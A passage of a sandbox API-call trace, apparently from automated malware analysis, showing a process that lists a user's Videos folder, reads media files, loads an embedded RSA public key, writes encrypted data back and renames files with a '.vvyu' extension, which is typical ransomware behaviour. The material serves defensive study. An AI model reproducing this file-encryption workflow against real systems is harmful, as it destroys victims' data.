dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.394] GetCurrentThreadId () returned 0x66c [0195.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea0730 [0195.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0195.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.395] GetCurrentThreadId () returned 0x66c [0195.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0195.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cf0 [0195.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c90 [0195.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0195.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ca8 [0195.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c78 [0195.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d08 [0195.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0195.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cd8 [0195.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cc0 [0195.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d20 [0195.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2cc0 [0195.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0195.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0195.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c90 [0195.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea4a68 [0195.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0195.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea4c78 [0195.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0195.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0195.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea4e90 [0195.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4c78 | out: hHeap=0x620000) returned 1 [0195.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e90 | out: hHeap=0x620000) returned 1 [0195.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c78 | out: hHeap=0x620000) returned 1 [0195.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea13c8 | out: hHeap=0x620000) returned 1 [0195.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0195.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0195.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.456] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xd459, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xd459, lpOverlapped=0x0) returned 1 [0195.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.458] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xd45e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.458] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0195.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea4a68 [0195.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea4a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea4e98 [0195.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.459] WriteFile (in: hFile=0x568, lpBuffer=0x2ea4e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea4e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.460] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4e98 | out: hHeap=0x620000) returned 1 [0195.460] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.460] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.460] CloseHandle (hObject=0x568) returned 1 [0195.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0195.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea4a68 [0195.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0195.462] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\6s3WjoHyRIY3EiBz5-U.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\6s3wjohyriy3eibz5-u.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\6s3WjoHyRIY3EiBz5-U.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\6s3wjohyriy3eibz5-u.avi.vvyu")) returned 1 [0195.463] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.464] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.466] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0195.467] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798ad850, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798ad850, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7e35a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0195.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea13c8 [0195.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb45f0 [0195.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea13c8 | out: hHeap=0x620000) returned 1 [0195.467] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\desktop.ini") returned=".ini" [0195.467] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0195.467] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1134fc0, ftCreationTime.dwHighDateTime=0x1d8a329, ftLastAccessTime.dwLowDateTime=0xf41f5970, ftLastAccessTime.dwHighDateTime=0x1d8a386, ftLastWriteTime.dwLowDateTime=0xf41f5970, ftLastWriteTime.dwHighDateTime=0x1d8a386, nFileSizeHigh=0x0, nFileSizeLow=0xeef5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hDvzuhrdv.mkv", cAlternateFileName="HDVZUH~1.MKV")) returned 1 [0195.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea13c8 [0195.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb45f0 [0195.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea13c8 | out: hHeap=0x620000) returned 1 [0195.468] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\hDvzuhrdv.mkv") returned=".mkv" [0195.468] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\hDvzuhrdv.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\hdvzuhrdv.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.468] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=61173) returned 1 [0195.468] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.471] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xeecf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.471] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.473] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.474] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.474] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.474] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xeef5, lpOverlapped=0x0) returned 1 [0195.475] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.475] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.475] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.475] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.475] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.476] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.476] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.476] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.476] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.476] GetLastError () returned 0x0 [0195.476] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.476] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.477] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.477] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.477] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.477] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0195.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef00) returned 0x2ea79b0 [0195.477] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea13c8 [0195.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c60 [0195.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1410 [0195.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c78 [0195.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ca8 [0195.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d08 [0195.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cc0 [0195.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.478] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea4a68 [0195.478] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ca8 | out: hHeap=0x620000) returned 1 [0195.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cc0 | out: hHeap=0x620000) returned 1 [0195.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.479] 